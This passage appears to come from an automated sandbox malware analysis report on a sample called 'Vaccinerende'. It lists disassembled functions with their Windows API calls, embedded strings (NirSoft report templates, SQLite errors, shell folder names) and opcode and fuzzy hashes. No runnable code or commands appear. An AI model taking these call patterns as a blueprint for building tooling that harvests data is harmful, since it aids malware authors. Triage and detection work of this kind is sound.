                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                              • String ID: caption
                                                                              • API String ID: 973020956-4135340389
                                                                              • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                              • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                              • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                              • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                              Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                              • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$_snwprintf$wcscpy
                                                                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                              • API String ID: 1283228442-2366825230
                                                                              • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                              • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                              • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                              • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                              Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wcschr.MSVCRT ref: 00413972
                                                                              • wcscpy.MSVCRT ref: 00413982
                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                              • wcscpy.MSVCRT ref: 004139D1
                                                                              • wcscat.MSVCRT ref: 004139DC
                                                                              • memset.MSVCRT ref: 004139B8
                                                                                • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                              • memset.MSVCRT ref: 00413A00
                                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                              • wcscat.MSVCRT ref: 00413A27
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                              • String ID: \systemroot
                                                                              • API String ID: 4173585201-1821301763
                                                                              • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                              • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                              • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                              • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                              Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: wcscpy
                                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                              • API String ID: 1284135714-318151290
                                                                              • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                              • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                              • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                              • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                              Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                              • String ID: 0$6
                                                                              • API String ID: 4066108131-3849865405
                                                                              • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                              • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                              • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                              • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                              Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 004082EF
                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                              • memset.MSVCRT ref: 00408362
                                                                              • memset.MSVCRT ref: 00408377
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 290601579-0
                                                                              • Opcode ID: 6f0692b1ad47d209bd08c5194d00cfda551af10c8340107b95c049cf77cc9a6b
                                                                              • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                              • Opcode Fuzzy Hash: 6f0692b1ad47d209bd08c5194d00cfda551af10c8340107b95c049cf77cc9a6b
                                                                              • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                              Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memchr.MSVCRT ref: 00444EBF
                                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                              • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                              • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                              • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                              • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                              • memset.MSVCRT ref: 0044505E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$memchrmemset
                                                                              • String ID: PD$PD
                                                                              • API String ID: 1581201632-2312785699
                                                                              • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                              • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                              • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                              • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                              Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                              • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                              • GetDC.USER32(00000000), ref: 00409F6E
                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                              • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                              • GetParent.USER32(?), ref: 00409FA5
                                                                              • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                              • String ID:
                                                                              • API String ID: 2163313125-0
                                                                              • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                              • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                              • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                              • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                              Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: free$wcslen
                                                                              • String ID:
                                                                              • API String ID: 3592753638-3916222277
                                                                              • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                              • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                              • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                              • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                              Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040A47B
                                                                              • _snwprintf.MSVCRT ref: 0040A4AE
                                                                              • wcslen.MSVCRT ref: 0040A4BA
                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                              • wcslen.MSVCRT ref: 0040A4E0
                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpywcslen$_snwprintfmemset
                                                                              • String ID: %s (%s)$YV@
                                                                              • API String ID: 3979103747-598926743
                                                                              • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                              • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                              • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                              • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                              Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                              • wcslen.MSVCRT ref: 0040A6B1
                                                                              • wcscpy.MSVCRT ref: 0040A6C1
                                                                              • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                              • wcscpy.MSVCRT ref: 0040A6DB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                              • String ID: Unknown Error$netmsg.dll
                                                                              • API String ID: 2767993716-572158859
                                                                              • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                              • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                              • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                              • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                              Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                              • wcscpy.MSVCRT ref: 0040DAFB
                                                                              • wcscpy.MSVCRT ref: 0040DB0B
                                                                              • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                              • API String ID: 3176057301-2039793938
                                                                              • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                              • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                              • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                              • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                              Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • database is already attached, xrefs: 0042F721
                                                                              • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                              • too many attached databases - max %d, xrefs: 0042F64D
                                                                              • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                              • database %s is already in use, xrefs: 0042F6C5
                                                                              • unable to open database: %s, xrefs: 0042F84E
                                                                              • out of memory, xrefs: 0042F865
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpymemset
                                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                              • API String ID: 1297977491-2001300268
                                                                              • Opcode ID: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                              • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                              • Opcode Fuzzy Hash: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                              • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                              Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                              • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                              • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                              • String ID: ($d
                                                                              • API String ID: 1140211610-1915259565
                                                                              • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                              • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                              • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                              • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                              Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                              • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                              • GetLastError.KERNEL32 ref: 004178FB
                                                                              • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$ErrorLastLockSleepUnlock
                                                                              • String ID:
                                                                              • API String ID: 3015003838-0
                                                                              • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                              • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                              • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                              • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                              Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00407E44
                                                                              • memset.MSVCRT ref: 00407E5B
                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                              • wcscpy.MSVCRT ref: 00407F10
                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                              Memory Dump Source
